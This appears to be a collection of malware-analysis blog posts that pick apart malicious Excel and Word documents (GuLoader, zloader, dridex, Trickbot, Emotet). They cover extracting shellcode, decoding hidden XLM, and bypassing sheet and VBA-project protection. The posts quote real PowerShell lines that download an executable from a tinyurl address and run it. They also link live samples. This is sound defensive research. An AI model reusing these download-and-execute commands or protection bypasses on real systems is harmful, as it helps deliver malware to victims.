oleObject1.bin – OLe10nATive – shellcode

I came across a GuLoader .xlsx document the other day. It didn’t have any VBA or XLM macros, locked or hidden or protected sheets, or anything obvious like that. Instead, this is the only thing I saw in oledump.

It was a bit odd. So let’s see what it takes to tear apart a document such as this. If you’d like to play along, here’s the specimen: https://app.any.run/tasks/706a2ec9-c993-40e0-811a-b18358531b24

A special shout out to @ddash_ct! He helped point me in the right direction for extracting the shellcode.


Upon unzipping the file, we can find oleObject1.bin inside the xl/embeddings folder.
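If you would rather script this step, here is a minimal Python sketch that uses only the standard library. It assumes the document is an ordinary OOXML ZIP package and checks each embedded part for the 8-byte OLE compound-file signature (D0 CF 11 E0 A1 B1 1A E1). The function names are hypothetical helpers, not part of any tool used in this post.

```python
import io
import zipfile

# Signature at the start of every OLE compound file.
OLE_MAGIC = b"\xD0\xCF\x11\xE0\xA1\xB1\x1A\xE1"


def list_embeddings(xlsx_bytes: bytes) -> list[str]:
    """Return the names of parts stored under xl/embeddings/ in the package."""
    with zipfile.ZipFile(io.BytesIO(xlsx_bytes)) as zf:
        return [name for name in zf.namelist()
                if name.lower().startswith("xl/embeddings/")]


def read_embedding(xlsx_bytes: bytes, name: str) -> bytes:
    """Read one embedded part without unzipping the whole document to disk."""
    with zipfile.ZipFile(io.BytesIO(xlsx_bytes)) as zf:
        return zf.read(name)


def is_ole_compound(data: bytes) -> bool:
    """True if the bytes start with the OLE compound-file signature."""
    return data[:8] == OLE_MAGIC
```

Anything that passes is_ole_compound is worth a closer look with oledump.py.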

If you recall, OLE stands for Object Linking and Embedding. Microsoft documents allow a user to link or embed objects into a document. A linked object stores its data outside of the document: if you update the source data, the link updates that data inside your document.

An embedded object becomes part of the new file and keeps no connection to its source file. This makes embedding a perfect way for attackers to hide or obfuscate code inside a malicious document.

OLe10nATive stream

oledump.py showed that oleObject1.bin contained a stream called OLe10nATive. This stream holds the native data of an embedded object, and it is present when an OLE1.0 embedded object in the container document has been converted to the OLE2.0 format.

We can extract this stream by using oledump to select object A1 and dump it to a file.
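oledump does the heavy lifting here. For reference, [MS-OLEDS] lays this stream out as a 4-byte little-endian NativeDataSize followed by the NativeData itself. The sketch below (hypothetical helper names) reads that header from the dumped bytes. Assuming the dump contains the stream as-is, offsets found in it include those 4 header bytes, so subtract 4 if you work on the stripped data instead.

```python
import struct


def parse_ole10native(stream: bytes) -> bytes:
    """Return the NativeData from a raw Ole10Native stream.

    Layout per [MS-OLEDS]: a 4-byte little-endian NativeDataSize,
    followed by NativeDataSize bytes of NativeData.
    """
    if len(stream) < 4:
        raise ValueError("stream too short to hold NativeDataSize")
    (size,) = struct.unpack_from("<I", stream, 0)
    native = stream[4:4 + size]
    if len(native) != size:
        raise ValueError(f"header claims {size:#x} bytes, found {len(native):#x}")
    return native


def dump_offset_to_native(offset: int) -> int:
    """Translate an offset in the raw dump to an offset inside NativeData."""
    return offset - 4
```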

Looking for shellcode

Now that we’ve extracted the stream, how are we going to find anything useful in here?

This is where the advice from @ddash_ct came in handy. He searched this stream output for a hex string like E8 00 00 00 00 and was able to extract the shellcode from there.

Why is this the case? And why that pattern?

Shellcode cannot assume it will be executed at any particular memory location, so it cannot use hard-coded addresses for either its code or its data. In other words, it must be position-independent. A hex string such as E8 00 00 00 00 can indicate where position-independent code starts. The opcode E8 00 00 00 00 translates to the instruction call $+5, which pushes the address of the next instruction onto the stack. The code can then pop that value into a register and use it as an anchor point for the rest of its execution.
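To make the pattern concrete, here is a small Python sketch that scans a buffer for the exact call $+5 bytes. The optional pop check (opcodes 58 through 5F are pop eax through pop edi) is an extra heuristic added for illustration to catch the classic call/pop idiom, and the load address passed to pushed_address is hypothetical.

```python
CALL_NEXT = b"\xE8\x00\x00\x00\x00"  # call $+5


def find_call_next(data: bytes, require_pop: bool = False) -> list[int]:
    """Return offsets of E8 00 00 00 00, optionally only when a pop follows."""
    hits = []
    pos = data.find(CALL_NEXT)
    while pos != -1:
        nxt = pos + len(CALL_NEXT)
        # 0x58-0x5F encode pop eax ... pop edi, the usual follow-up.
        if not require_pop or (nxt < len(data) and 0x58 <= data[nxt] <= 0x5F):
            hits.append(pos)
        pos = data.find(CALL_NEXT, pos + 1)
    return hits


def pushed_address(load_base: int, offset: int) -> int:
    """Address pushed by call $+5: the byte right after the 5-byte call."""
    return load_base + offset + len(CALL_NEXT)
```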

This is just an example and is not from the ole10native stream in our sample.

We will not find the exact E8 00 00 00 00 pattern in our file. Instead, we can search for a pattern like 00 00 and something interesting pops up at 0x00265D41.

While we do see a similar pattern, there is a significant difference. The opcode E8 is still a call, but this time its 4-byte displacement is 0x000000AF rather than zero. That displacement is relative: control transfers to 0xAF bytes past the end of the 5-byte call instruction, wherever that instruction happens to sit in memory at run-time. It seems we may have an instance of position-independent code, and it might be where some shellcode is hiding. Got that?
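Here is the same reasoning as a Python sketch. It decodes the signed 4-byte displacement that follows E8 and adds it to the offset just past the 5-byte instruction. find_short_forward_calls is a hypothetical helper for the looser search: it flags calls with a small positive displacement, and its 0xFF cap is an arbitrary assumption.

```python
import struct


def call_rel32_target(data: bytes, offset: int) -> int:
    """Decode an E8 rel32 call at `offset` and return its target offset.

    The displacement is signed and relative to the end of the 5-byte
    instruction, so the result does not depend on the load address.
    """
    if data[offset] != 0xE8:
        raise ValueError(f"no E8 opcode at {offset:#x}")
    (rel,) = struct.unpack_from("<i", data, offset + 1)
    return offset + 5 + rel


def find_short_forward_calls(data: bytes, max_rel: int = 0xFF) -> list[tuple[int, int]]:
    """Return (call_offset, target_offset) for E8 calls with 0 < rel32 <= max_rel."""
    hits = []
    for off in range(len(data) - 4):
        if data[off] == 0xE8:
            (rel,) = struct.unpack_from("<i", data, off + 1)
            if 0 < rel <= max_rel:
                hits.append((off, off + 5 + rel))
    return hits
```

If the bytes at 0x265D41 are E8 AF 00 00 00 as described, call_rel32_target would return 0x265DF5, again measured inside the dumped file.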

All this is to say that hex location 0x265D41 is a likely candidate for our purposes.

Extracting the shellcode

From here on out, this will be a very similar process to getting shellcode from .rtf documents. We can load up ole10native.bin in scDbg with a start offset of 0x265D41. We know we’re on the right track because we can see the unhooked call to ExpandEnvironmentStringsW.

Earlier blog posts showed that scDbg doesn’t work very well with ExpandEnvironmentStringsW. Instead, we can overwrite that with ExpandEnvironmentStringsA. To do so, we will need to unpack ole10native.bin. We do that by checking the box in scDbg for “Create Dump” and re-launch ole10native.bin using the same start offset of 0x265D41. scDbg will then save the dumped and unpacked file. In my case, it was called OLE10N~1.unpack.

Open the newly unpacked dump file and scroll to the bottom. You will see a variety of API names and other strings in plaintext. The string ExpandEnvironmentStringsW begins at offset 0x002660D9. Overwrite its trailing W with an A and save the changes.
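The same one-byte patch can be sketched in Python. This assumes the API name is stored as plain ASCII, as it appears in the dump, and only patches the first occurrence; patch_w_to_a is a hypothetical helper. Because the replacement is the same length, no other offsets shift.

```python
def patch_w_to_a(data: bytes, api: str = "ExpandEnvironmentStringsW") -> tuple[bytes, int]:
    """Replace the trailing W of an ASCII API name with A.

    Returns the patched copy and the offset of the byte that changed.
    """
    needle = api.encode("ascii")
    if not needle.endswith(b"W"):
        raise ValueError("expected a wide-character (...W) API name")
    pos = data.find(needle)
    if pos == -1:
        raise ValueError(f"{api} not found")
    target = pos + len(needle) - 1  # index of the trailing W
    patched = bytearray(data)
    patched[target] = ord("A")
    return bytes(patched), target
```

If the string starts at 0x2660D9, the W sits 24 bytes later, at 0x2660F1.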

Before we toss this into scDbg again, we need a new start offset. It can be found at the beginning of this part of the shellcode. Notice the bytes right before k.e.r.n.e.l.3.2: they also follow the E8 00 00 00 00 pattern.
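The k.e.r.n.e.l.3.2 that the hex editor shows is the string kernel32 stored as UTF-16LE. A small Python sketch for locating it and the nearest preceding call $+5 might look like this. The 64-byte search window is an arbitrary assumption, and the helper names are hypothetical; the start offset should still be confirmed in the hex editor.

```python
CALL_NEXT = b"\xE8\x00\x00\x00\x00"  # call $+5


def find_wide(data: bytes, text: str) -> int:
    """Offset of `text` stored as UTF-16LE, or -1 if absent."""
    return data.find(text.encode("utf-16-le"))


def call_before(data: bytes, text: str, window: int = 64) -> int:
    """Offset of the last E8 00 00 00 00 within `window` bytes before `text`."""
    pos = find_wide(data, text)
    if pos == -1:
        return -1
    return data.rfind(CALL_NEXT, max(0, pos - window), pos)
```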

Toss our unpacked and edited binary into scDbg and enter 0x00266080 as the start offset. And when we do, the shellcode commands are revealed.

Thanks for reading!

Practical Malware Analysis (the book)

XLSB: Analyzing a Microsoft Excel Binary Spreadsheet

The @InQuest crew has been putting some unusual documents out on the Twitters and I thought I’d take a closer look at one of them. And as ALWAYS, new documents are never that straightforward to analyze. Attackers always put a twist on what has already been done.

In this case, we’ve got an .xlsb file, XLM code, hidden sheets, protected sheets, and the ever-so-sneaky-hiding-in-plain-sight white font.

Here’s the doc: https://app.any.run/tasks/47e1c347-664c-4ada-9655-1724387e859e/#

Microsoft Excel Binary Spreadsheets (.xlsb)

I can’t say that I’d ever seen these before now. They open and function like any other spreadsheet. The difference is under the hood: the parts inside the package are stored in a binary format (BIFF12) rather than the XML used by .xlsx. An .xlsb file is still a ZIP package like .xlsx, and because binary parts are more compact than XML, .xlsb files are often smaller. Extremely complicated spreadsheets (ones with lots of formulas, charts, and shapes) can benefit from this file format as they may save and load much faster.

But this format means that some of our normal analysis tools do not work. For example, oledump can’t find any OLE objects in the file.

OfficeMalScanner will expand the document if you use the inflate option. However, the output doesn’t show the normal vbaproject.bin. There’s a ton of other files that are NOT vbaproject.bin. (Of course, there’s no vbaproject.bin. Oledump.py didn’t find any macros, right?)

In hindsight, all of these .bin files make sense as this is an .xlsb file. It certainly didn’t make sense the first time I cracked it open, though.
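That inflate step works because an .xlsb file, like an .xlsx, is a ZIP package; only the parts inside differ. A minimal Python sketch (hypothetical helper name) that groups the parts by extension makes the difference visible: an .xlsb shows .bin parts such as xl/workbook.bin and xl/worksheets/sheet1.bin where an .xlsx would have .xml.

```python
import io
import posixpath
import zipfile

ZIP_MAGIC = b"PK\x03\x04"


def parts_by_extension(package: bytes) -> dict[str, list[str]]:
    """Group the parts of an Office ZIP package (.xlsx/.xlsm/.xlsb) by extension."""
    if not package.startswith(ZIP_MAGIC):
        raise ValueError("not a ZIP-based Office package")
    groups: dict[str, list[str]] = {}
    with zipfile.ZipFile(io.BytesIO(package)) as zf:
        for name in zf.namelist():
            ext = posixpath.splitext(name)[1].lstrip(".").lower()
            groups.setdefault(ext, []).append(name)
    return groups
```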

Analysis from within the document

First, there are a bunch of hidden sheets.

Quite a few of these sheets contain a lot of nonsense.

However, Auto_Open is pointing to Sheet11!A1. If we go there, we find columns that look empty but actually contain XLM in white font.

And of COURSE we can’t edit the font because a bunch of these sheets are protected AND we don’t have the password!

It is possible to enable content and step through the XLM like we’ve done before. However, the other sheets contain macro code and characters that are spread out all over the place. That would be annoying to analyze even if it weren’t in white font.

Unprotecting the sheets

All hope is not lost. We can bypass the protected sheets if we save the document in a different macro-enabled format like .xlsm. This will also change the worksheets from .bin files to .xml files. This will be important in a moment.

Rename your newly created .xlsm file to .zip and navigate into xl\worksheets and xl\macrosheets to find the .xml sheets. We will unprotect these sheets by removing an element called sheetProtection. Delete everything from <sheetProtection to its trailing />, including the opening < and the closing >, and then save the .xml. Delete sheet protection wherever you find it.

You’ll have to drag the various .xml files out of the .zip file, edit them, and then copy them back into their appropriate locations. Finally, change the file from .zip to .xlsm.
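If there are many sheets, the drag-edit-copy loop can be scripted. This is a minimal Python sketch under a few assumptions: the file is an .xlsm saved as described above, sheetProtection always appears as a self-closing element, and only xl/worksheets and xl/macrosheets are touched (workbook-level protection is left alone). It writes a new package instead of editing the ZIP in place; unprotect_xlsm is a hypothetical name.

```python
import io
import re
import zipfile

# Matches a self-closing <sheetProtection ... /> element with its attributes.
SHEET_PROTECTION = re.compile(rb"<sheetProtection\b[^>]*/>")
TARGET_DIRS = ("xl/worksheets/", "xl/macrosheets/")


def unprotect_xlsm(data: bytes) -> tuple[bytes, list[str]]:
    """Return a copy of the package with sheet protection removed, plus changed parts."""
    changed = []
    out = io.BytesIO()
    with zipfile.ZipFile(io.BytesIO(data)) as src, \
         zipfile.ZipFile(out, "w", zipfile.ZIP_DEFLATED) as dst:
        for item in src.infolist():
            body = src.read(item.filename)
            if item.filename.startswith(TARGET_DIRS) and item.filename.endswith(".xml"):
                body, count = SHEET_PROTECTION.subn(b"", body)
                if count:
                    changed.append(item.filename)
            dst.writestr(item.filename, body)  # copy every part, edited or not
    return out.getvalue(), changed
```

Save the returned bytes with an .xlsm extension and open it in Excel as before.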

Analyzing the XLM

Now that the sheets are unprotected, we can finally get rid of that white font and see the XLM. Auto_open is pointing to Sheet11!A1. I color-coded the extraneous lines and analyzed the three important =CALL() commands.

Ultimately, it downloads a .dll to C:\ProgramData\fps\ and registers that .dll via rundll32.exe.

As a bonus, Excel does some of the XLM concatenation for us, making analysis easier. Here’s an example from Sheet1. You can see that cell L3 contains =CONCATENATE(Sheet…), but the cell itself shows the result.

Good times!

Thanks for reading.

Snake/404 Keylogger, BIFF, and Covering Tracks?: An unusual maldoc

It’s always interesting to see how attackers take a variety of techniques and wrap them up into one document. Some are so heavily, heavily obfuscated that it’s rather easy to point and say, “Oh, the malicious stuff is probably in there. I should focus on that.” Others are rather sparse and you have to spend some more time digging to put the clues together.

This evening’s document is the latter (https://app.any.run/tasks/6b24ab8c-1626-41e1-aa32-39e96fd266d5/). It contains password protected macros, but they’re empty. There’s an XLM line that isn’t difficult to find and decode, but that single line doesn’t explain how the .exe gets downloaded.

All in all, the complication was finding the bits and pieces of code in the document and putting them together to match the Any.run behavior.

The Obvious XLM

If you open the spreadsheet and search for “=”, you’ll end up in cell H177.

The hex isn’t tough to decode. You end up with something like the command below. Powershell is used to change to the $env:appdata directory and execute gn.exe.

=EXEC(powershell -w 1 -EP bypass stARt-slEEp 25; cd ${enV`:appdata};.('.'+'/gn.exe'))

However, where does gn.exe get downloaded?

BIFF – Binary Interchange File Format

BIFF is the binary file format that is used to save Excel workbooks. This binary format is more commonly referred to as XLS or MS-XLS and was the default format for Excel through MS Office 2003. There have been a variety of BIFF versions over the years as new versions of Excel were released (BIFF2 – Excel 2.1; BIFF3 – Excel 3.0; BIFF4 – Excel 4.0, etc.).

.xls files are structured as OLE (object linking and embedding) compound files. These compound files can store a variety of streams of data. One of them is the Workbook stream, which holds the BIFF records. We are used to using oledump.py to search for and dump macros. Yet as I said above, these macros are empty.

oledump.py -p plugin_biff

oledump.py also lets us look through the BIFF records. We can do that with this command:

oledump.py -p plugin_biff --pluginoptions "-x" [document.xls]

There’s a lot of output here so let’s take a look at it. The first line shows that a very hidden macro sheet exists. We’ll need to take care of that. The fourth line shows that there is a cell with the name Auto_Open which will execute as soon as the document is opened.
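For the curious, the very hidden flag lives in the BOUNDSHEET record (type 0x0085) of the Workbook stream. BIFF8 records are a 2-byte type and a 2-byte length followed by the payload, and the low two bits of the byte after the 4-byte stream position give the visibility (0 visible, 1 hidden, 2 very hidden). The Python sketch below walks the records of a Workbook stream you have already dumped (for example with oledump's -s and -d options) and lists each sheet. It is a simplified parser written for illustration, not how plugin_biff is implemented.

```python
import struct

BOUNDSHEET = 0x0085
HIDDEN_STATE = {0: "visible", 1: "hidden", 2: "very hidden"}
SHEET_TYPE = {0x00: "worksheet", 0x01: "macro sheet", 0x02: "chart", 0x06: "VBA module"}


def iter_records(stream: bytes):
    """Yield (offset, record_type, payload) for each BIFF8 record."""
    pos = 0
    while pos + 4 <= len(stream):
        rtype, size = struct.unpack_from("<HH", stream, pos)
        yield pos, rtype, stream[pos + 4:pos + 4 + size]
        pos += 4 + size


def list_sheets(stream: bytes) -> list[tuple[str, str, str]]:
    """Return (name, sheet type, visibility) for every BOUNDSHEET record."""
    sheets = []
    for _, rtype, data in iter_records(stream):
        if rtype != BOUNDSHEET or len(data) < 8:
            continue
        state = data[4] & 0x03              # hsState: low two bits
        kind = data[5]                      # dt: sheet type
        cch, wide = data[6], data[7] & 0x01  # name length and fHighByte flag
        raw = data[8:8 + cch * (2 if wide else 1)]
        name = raw.decode("utf-16-le" if wide else "latin-1")
        sheets.append((name, SHEET_TYPE.get(kind, hex(kind)),
                       HIDDEN_STATE.get(state, "unknown")))
    return sheets
```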

The remaining output shows FORMULA cells that will get executed in some way. Some of it is parsed successfully, others not so much. Either way, we can see a tinyurl.com address. This is most likely the URL from which the .exe gets downloaded. These formulas are stored somewhere. Let’s get that very hidden macro sheet unhidden and see what we can see.

Unhiding the macro sheet

This process of unhiding a macro sheet is outlined in more detail here. Essentially, we need to toss the following VBA in a macro and execute it. Of course, the macros in this document are password protected, but other posts of mine show how to bypass it.

This VBA code uncovers a new sheet in the document. We will need to change the font color from white to black to see its contents.

We can see the typical GET.WORKSPACE checks for a mouse (line 126) and the ability to play sounds (line 127). After that, it takes the macro code from Sheet1 and copies it to D131.

Line 129 contains the obfuscated line that does the actual downloading:

powershell -w 1 (nEw-oBjecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://tinyurl.com/y7zcye22','gn.exe')

We already saw the deobfuscated command in line 131 above.

Covering Tracks?

XLM code has the ability to make actual changes to the cells. This, in effect, also makes changes to the document itself. Line 138 will save whatever changes have been made thus far. And what do we notice happening right before that save? A blank cell is copied on top of 131, a cell that contained the command to execute gn.exe.

My first thought was that the purpose of overwriting line 131 was to make it tougher for incident responders to analyze a possibly malicious document. I also initially thought that overwriting line 130 was a mistake, as it was already blank. It seemed to me that 129 would be a better candidate, as it contains another of the smoking guns that downloaded the malware.

I don’t think this is likely for two reasons. First, if my theory is true, it means that each malicious document in this campaign can be used only once. Once the XLM code is enabled, it gets one shot to reach out, download, and execute the malware before cleaning up its own tracks. There is no opportunity for the victim to try re-opening the document and getting infected again. Second, there is no XLM code to overwrite the obfuscated command in Sheet1!H177. If an attacker were concerned about covering his tracks in this way, I think that command would have been deleted as well.


So like I said, this document was unusual. It contained a lot of things we’ve seen before like XLM, very hidden sheets, and password-protected macros, but this was a new combination of a variety of techniques. Plus we saw the added XLM commands that delete lines. If someone’s got a better theory about its purpose, I’m all ears. I just wonder if we’re going to see this technique more often? Ideas do have a way of getting around.

Thanks for reading.

zloader: Simpler XLM and hidden encoded strings

It has been a while since an interesting document came across my desk. The XLM and sandbox evasion checks in today’s document were different enough that I wasn’t sure whether it was going to be zloader. But grabbing the executable and tossing it into any.run (or tria.ge, if you’re one of the cool kids) confirmed it was zloader.

Document: https://app.any.run/tasks/476caae4-d8c4-4b62-a33b-f9ce3258cd1e
Executable (any.run): https://app.any.run/tasks/7d3acbcc-d47c-408e-a42f-a8865d758f21
Executable (tria.ge): https://tria.ge/201202-6crv4myx46

Decoding Macro

As per usual, the main XLM macro is in a single column. However, it wasn’t the usual massive block of XLM code. It is conceptually the same in that variables will be set up to control the decoding loops. But rather than that information being in the XLM code itself, the XLM grabs numbers and encoded strings from a different sheet. In this case, the decoding macro is in column 1 of sheet JattwdYRiEl, and the encoded strings and loop control variables are in Sheet1. Here is a truncated view of the macro to make it easier to understand its flow. Auto_Open sets up a location that points to the beginning of the macro to start decoding strings. vGdNGoO jumps execution to the top of the macro.

SHEET1: Populating Variables

Sheet1 contains what looks very much like some sort of encoded string. Some of the numbers and values in Sheet1 are used to populate the counting variables in the decoding loop. Here are a few examples.

A new development is the location of the encoded strings. They are now defined names within the Excel document itself. These names can be found in the Name Manager in Excel. If you look carefully, you can see that a semicolon is used to separate the encoded strings in DLZETTDk.

While the decoding mechanism itself is interesting from an academic perspective, I won’t be diving deeply into it. Suffice it to say, these encoded strings get decoded character by character and tossed into variable ovTMv. Once completed, the XLM code writes the decoded string to R114C1, overwriting =HALT(). The next string gets decoded and written to R115C1, and so on.

Decoded Strings 1

Once the first round of strings is decoded, RETURN() will jump execution to R114C1. What follows are some more sandbox checks and variable setup. It looks like a file might get written to C:\Users\Public\Documents\. R125C1:R127C1 sets up new variables for the second round of decoding. R131C1 points execution back to the top of the decoding loop, which starts the second round of decoding. Those strings will get written starting at R132C1.

Decoded Strings 2

There is a lot going on in the next block of XLM code. The .exe is downloaded to C:\Users\Public\Documents\dfdMmb2W.txt as a text file. Rundll32.exe is used to execute it. Notice the GET.WORKSPACE(1) check in R134C1. If it fails, execution jumps down to R143C1. This sets up a .vbs file, populates it with commands, and then executes it. It will ultimately do the same thing by downloading the executable and executing it with rundll32.exe.

So that’s pretty much it. The main decoding XLM code is cleaner, but the main difference is that the control variables are in another sheet and the encoded strings are defined names.

Thanks for reading!

dridex maldoc: The unholy union of VBA and XLM

Kirk Sayre (@bigmacjpg) posted some info on a dridex malicious document the other day. It was a real piece of work. To put it succinctly, the VBA script grabs data from cells in the spreadsheet, decodes them, and then runs them as an XLM command. Even better, all of the cells have white font (tricky, tricky).

Here’s the info Kirk dumped from the document:


And here’s the document itself:


First things first

Before we can start stepping through the macro, we find that the VBA project is unviewable.

Enter: EvilClippy. Much could be written here about how this tool works, but just read this article by Carrie Roberts (@OrOneEqualsOne) instead. It is fantastic.

We can make the project viewable by using the -uu option. EvilClippy automatically writes a new copy of the document in which the project is viewable.


lncol() is the main Sub. Much of the other logic/decoding functions branch off this one.

Lines 90/91: pic, oks, and img become the names of the new folders created and the name of the downloaded file. More on them later.
Line 92: This for loop will cycle through rows A208 to A212.

Line 94: Send the information from cell A208 along with a random number from 1 through 4 to function Ami.

Creating the XLM String

Line 45: Take content from A208, send to function verud, and put results in array df.
Line 53: Convert cell content to decimal numbers.
Lines 46-47: Take each number in array, add f (remember, that random number from 1-4), and send to function zen.
Line 39: Convert decimal number back to ASCII.
Line 47: Add ASCII character to variable Ami. Convert the rest of the array in the same manner. Then head back to the main function…

Line 95: This line is important. It checks to see if the string you just decoded ends in a right parenthesis “)”. If it does, continue on to line 96. If it doesn’t, run line 94 again until you get the desired output. This is why the random number from 1-4 is important. It will keep looping and decoding until the right output is created.
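The Ami/zen round trip can be emulated in Python. This sketch assumes that verud simply turns each character into its character code, which is a guess based on the description above; the real cells may be encoded differently, and the function names are hypothetical. Rather than picking f at random like the macro, it tries 1 through 4 in order and keeps the first output that ends in ")".

```python
def shift_decode(encoded: str, f: int) -> str:
    """Add f to each character code and convert back to a character."""
    return "".join(chr(ord(ch) + f) for ch in encoded)


def decode_cell(encoded: str, shifts=range(1, 5)) -> tuple[int, str]:
    """Try each shift in turn and return the first result ending in ')'."""
    for f in shifts:
        candidate = shift_decode(encoded, f)
        if candidate.endswith(")"):
            return f, candidate
    raise ValueError("no shift produced a string ending in ')'")
```

Trying the values in order reaches the same answer the macro eventually lands on, without relying on its random loop.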

Here are all five of those decoded cells. But cells A209-A212 are not complete. Certain characters in those XLM strings will need to be replaced before they can be executed.

Replacing Characters in XLM String

Line 97: This line calls up function kio which will execute the XLM string (line 105). BUT before it does that, the string itself needs to be altered. That is the purpose of function vs.
Line 108: This function looks for the semicolon, single quotation mark, dollar sign, and question mark and replaces them if they’re found in the string. The replacement values become the names of the directories that are created as well as the URL from which the malware is downloaded.

Speaking of URLs…

These are the remaining strings still buried in the spreadsheet. They can be found in cells A593:D626.

Function mores() decodes these strings.

Line 23: Get a random row between 593 and 626.
Lines 24-29: Start with column 1 and grab that cell’s contents. If it is empty, try columns 2 through 4 until you get a cell with text in it.
Line 31: Send that found data to function Ami. Note that the value for f is the same as the column.

Once everything is laid out, it isn’t too complicated. But get ready for either more like this or adjustments to this layout.

Thanks for reading!

zLoader XLM Update: Macro code and behavior change

We’ve got ourselves a change to the zloader XLM code and also some document behavior. Here’s today’s sample:



Central Loop Mechanism

The decoding part of the central loop mechanism still exists as it did before. It grabs hex characters from elsewhere in the document, decodes them, and writes those strings to new cells. However, in this case, the document only runs through two rounds of this decoding.

Round 1

The first round behaves pretty much the same as it did before. It checks to see if it’s in a sandbox, checks the registry, and if VBAWarnings is turned on, the code will go back to the loop and start round 2.

Round 2

This is where the main difference lies. A series of lines get written to a file called QP0L3.vbs and then executed.


The code in the .vbs file is nothing that special. It’s just an array of URLs going through a For Each loop. The file gets downloaded and then saved as an .html to the Temp folder.

Back to Round 2

At this point, the .html file is executed with what looks to be rundll32.exe.

And that’s pretty much it! Again, not a major change, but I thought it was a noteworthy one.

Thanks for reading!

Trickbot: ActiveDocument.Words is the word!

This Trickbot document hid a .dll in an interesting place. If you’d like to play along, you can find the document and dropped .dll here:

Document: https://app.any.run/tasks/96c149ce-b01a-4543-a8d4-2b98bb18b9c7
Document Password: INV15
SHA256: 052C9196DFE764F1FBD3850D706D10601235DC266D1151C93D34454A12206C28

Dropped File: C:\programdata\objStreamUTF8NoBOM.Vbe
Dropped File: C:\UTF8NoBOM\APSLVDFB.dll
Dropped .dll: https://app.any.run/tasks/5bc86667-aab3-4513-a433-3697d6a9d3eb

After supplying the provided password to open the document, I suggest that you remove it, save the document, and then use tools like oledump.py to extract the macro. Notice how it keeps making references to ActiveDocument.Range(Start and End) and ActiveDocument.Words.

The macro pulls data from the current document, pieces it together, and then writes it out to C:\programdata\objStreamUTF8NoBOM.Vbe.


Once that is done, the macro creates a Wscript.exe object and executes that .vbe file.

But where did it get all of that data? Where was it hiding in the document? Well, it wasn’t really ‘hiding’ in the typical places we see obfuscated commands (I’m looking at you, Emotet). In this case, it was hiding behind the picture we see in the document itself. We can see the text below by deleting that picture and zooming in to 400%.

You can fit an entire .dll on one page of a Word document if you use 1-point font. Who knew?

The macro in the document takes the above characters, rearranges them, and writes them to objStreamUTF8NoBOM.Vbe. Here’s that .vbe file.

Near the bottom of objStreamUTF8NoBOM.Vbe, we can see the base64 decoding function. The decoded .dll gets written to C:\UTF8NoBOM\APSLVDFB.dll.


The last two lines create a wscript.shell object and use regsvr32 to run the .dll.

And there you go! Thanks for reading!

2020-08-05: Update on zloader XLM code

On August 5, 2020, @abuse_ch warned about more ZLoader activity:

It had been a while since an XLM document had crossed my desk, and I was wondering whether anything had changed since the last one I did in mid-July. It hadn’t. I’ll be honest, these ones are a real pain to get through. But if you know what to look for, they’re not that difficult to unravel. I’ve even got some tips on how to become more efficient at investigating this particular document. Let’s get to it.

XLM Code Location

This version of the zloader document is interesting because the main activity takes place all in one column rather than being scattered all over the place. This column contains all of the loops and functions that will create, write, and execute the commands needed to reach out to a URL and begin downloading. The XLM commands begin in R337C185.

While the XLM code starts there, that is not where the entry point is located. It took some time to figure it out, but execution actually starts in R443C185.
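This family mixes R1C1 references (R443C185) with the A1 style shown in Excel’s Name Box, so a small converter saves some squinting. A minimal Python sketch that handles only absolute RnCn references (the function names are hypothetical):

```python
import re

R1C1 = re.compile(r"^R(\d+)C(\d+)$", re.IGNORECASE)


def column_letters(col: int) -> str:
    """Convert a 1-based column number to Excel letters (1 -> A, 27 -> AA)."""
    letters = ""
    while col > 0:
        col, rem = divmod(col - 1, 26)
        letters = chr(ord("A") + rem) + letters
    return letters


def r1c1_to_a1(ref: str) -> str:
    """Translate an absolute reference such as R443C185 into A1 style."""
    match = R1C1.match(ref.strip())
    if not match:
        raise ValueError(f"not an absolute R1C1 reference: {ref!r}")
    row, col = int(match.group(1)), int(match.group(2))
    return f"{column_letters(col)}{row}"
```

For example, r1c1_to_a1("R443C185") returns "GC443" and r1c1_to_a1("R17978C243") returns "II17978".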

This XLM code contains three basic steps.

  1. Set up variables and locations from which to grab hex characters and where to write new strings.
  2. Grab hex characters, convert them to ASCII, and write them to a new location.
  3. Jump to new location and execute XLM commands.
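Step 2 boils down to hex-to-ASCII conversion. A minimal Python sketch follows; it assumes each source cell holds the hex for one complete string, and decode_round with its row/column bookkeeping is hypothetical, meant only to mirror how decoded strings land in consecutive cells.

```python
def hex_to_ascii(hex_chars: str) -> str:
    """Turn a run of hex digits (two per character) into ASCII text."""
    cleaned = "".join(hex_chars.split())  # tolerate spaces or newlines
    return bytes.fromhex(cleaned).decode("ascii")


def decode_round(hex_cells: list[str], start_row: int, column: int) -> dict[str, str]:
    """Decode each cell and 'write' it to consecutive rows, R1C1-style."""
    return {f"R{start_row + i}C{column}": hex_to_ascii(cell)
            for i, cell in enumerate(hex_cells)}
```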

Step 1: Set up variables

For space-saving purposes, I copied the XLM commands to Notepad++ and removed the blank lines between them. Starting at the entry point (R443C185) and continuing down, some of these variables define the location of certain commands necessary for code execution. The highlighted variables below show where the hex characters can be found and also where to write the assembled strings.

Step 2: Convert hex to ASCII and write to new location

Things get kind of hairy here and I don’t know if there is a good way to explain this. Find “Start here” and follow the numbers in the dashed boxes.

Step 3: Jump to new location and execute

This part is pretty self-explanatory. Once all of those strings have been written, jump to R17978C243 and continue XLM command execution. You may remember that these are the commands that are used to evade sandboxes.

Understanding the Pattern

Now that we understand how this flows, we can see the pattern. After round one is completed, rounds two and three each provide new locations from which to grab hex characters, convert them, write to a new location, and then execute them.

Rounds two and three produce this output:

Making Analysis More Efficient: =PAUSE()

The XLM function =PAUSE() allows for the possibility of debugging. We can make the macro do most of the work for us if we use this strategically.

Looking at the original XLM commands to set up the variables, placing =PAUSE() right after the call to =ebnSmgBKoRc() will allow all of the hex to be decoded and written to R17977C243. Once it hits =PAUSE(), execution will… pause, allowing us to inspect it at our leisure. Make sure that you start the code execution at the entry point (R443C185). You need all of the variables populated so that the decoder function can run properly. Right-click on that cell and select Run. =PAUSE() can also be placed right after the other two decoding functions to grab that data.

Thanks for reading!

Emotet (2020-07-21): Still Making Use of Userforms

DISCLAIMER: Today’s sample is not overly complicated at all. Making use of Userforms is nothing new. Also, anyone can toss an Emotet document into Any.run in order to grab the base64 encoded Powershell string being executed.

Yet malicious documents must hide the commands they run on the system somewhere. Finding those locations and understanding how they work can help us better understand the tactics, techniques, and procedures (TTPs) of attackers.

Sample: https://app.any.run/tasks/475e4427-efd3-40c6-a19f-8703552d0194
MD5: 6f6987737db0575b978f60be457cd374
